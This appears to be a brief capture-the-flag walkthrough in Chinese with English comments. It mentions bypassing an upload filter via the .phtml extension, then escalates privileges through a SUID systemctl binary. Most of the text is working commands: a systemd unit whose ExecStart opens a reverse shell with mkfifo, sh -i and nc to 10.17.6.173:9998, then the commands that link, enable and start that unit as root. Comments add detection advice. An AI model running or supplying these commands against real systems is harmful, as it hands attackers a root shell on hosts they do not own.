前面是常规的文件上传

phtml绕过后缀检测

后面是一个 SUID 提权

systemctl

# Writes a systemd unit whose ExecStart runs a shell bridged through the FIFO
# /tmp/f to nc at 10.17.6.173:9998 (the remote end of the reverse shell used in
# this note). Nothing on this page assigns $TB, so as written the redirection
# target is empty; the later variant below uses $TF instead.
# Defender note: a oneshot unit with an ExecStart of this shape (mkfifo + sh -i
# + nc) is a well-known reverse-shell pattern and worth alerting on.
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target' > $TB


echo 的写法不好写，改用 cat

# mktemp creates an empty temp file, then ".service" is appended: TF therefore
# names a sibling path that does not exist yet (the file mktemp made is left
# unused), and the suffix is what lets systemctl treat it as a service unit.
TF=$(mktemp).service

# Same unit body as the echo variant above, written via a here-doc into 1.txt
# in the current directory first. The ExecStart line is the reverse-shell
# command (FIFO at /tmp/f, interactive sh, nc to 10.17.6.173:9998).
cat > 1.txt << EOF
[Service]
Type=oneshot
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.17.6.173 9998 >/tmp/f"
[Install]
WantedBy=multi-user.target
EOF

# Copy the unit to the temp path, register it by absolute path with
# `systemctl link`, then enable and start it. This note assumes systemctl is
# SUID (see the heading above); the unit then presumably runs under the
# system manager's privileges — TODO confirm on the target.
# Defender note: units linked/enabled from a temp directory, and the
# `systemctl link` / `enable --now` pair itself, are strong detection signals;
# a SUID bit on systemctl should be treated as a misconfiguration to remove.
cat 1.txt > $TF
systemctl link $TF
systemctl enable --now $TF